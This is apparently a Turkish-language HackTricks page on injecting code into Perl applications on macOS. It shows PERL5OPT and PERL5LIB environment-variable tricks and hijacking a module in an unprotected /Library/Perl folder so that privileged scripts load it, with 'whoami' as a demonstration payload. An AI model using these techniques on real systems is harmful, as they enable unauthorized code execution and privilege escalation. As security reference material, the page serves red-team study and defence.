macOS Perl Applications Injection

AWS hacklemeyi sıfırdan ileri seviyeye öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

PERL5OPT ve PERL5LIB Çevresel Değişkeni Aracılığıyla

Çevresel değişken PERL5OPT kullanılarak perl'in keyfi komutları çalıştırması mümkündür. Örneğin, bu betiği oluşturun:

test.pl
#!/usr/bin/perl
print "Hello from the Perl script!\n";

Şimdi çevre değişkenini ihraç et ve perl betiğini çalıştır:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

Başka bir seçenek, bir Perl modülü oluşturmaktır (ör. /tmp/pmod.pm):

/tmp/pmod.pm
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

Ve ardından çevresel değişkenleri kullanın:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Bağımlılıklar Aracılığıyla

Perl'in çalıştırıldığı bağımlılıkların klasör sırasını listelemek mümkündür:

perl -e 'print join("\n", @INC)'

Hangisi şöyle bir şey döndürecek:

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Bazı dönen klasörler bile mevcut değil, ancak /Library/Perl/5.30 mevcut, SIP tarafından korunmuyor ve SIP tarafından korunan klasörlerden önce bulunuyor. Bu nedenle, birisi o klasörü kötüye kullanarak betik bağımlılıklarını ekleyebilir, böylece yüksek ayrıcalıklı Perl betiği onu yükler.

Ancak, o klasöre yazabilmek için root olmanız gerektiğini unutmayın ve günümüzde bu TCC uyarısı alacaksınız:

Örneğin, bir betik use File::Basename; içe aktarıyorsa, /Library/Perl/5.30/File/Basename.pm oluşturularak keyfi kod yürütülmesi mümkün olacaktır.

Referanslar

AWS hacklemeyi sıfırdan kahraman olmaya öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

Last updated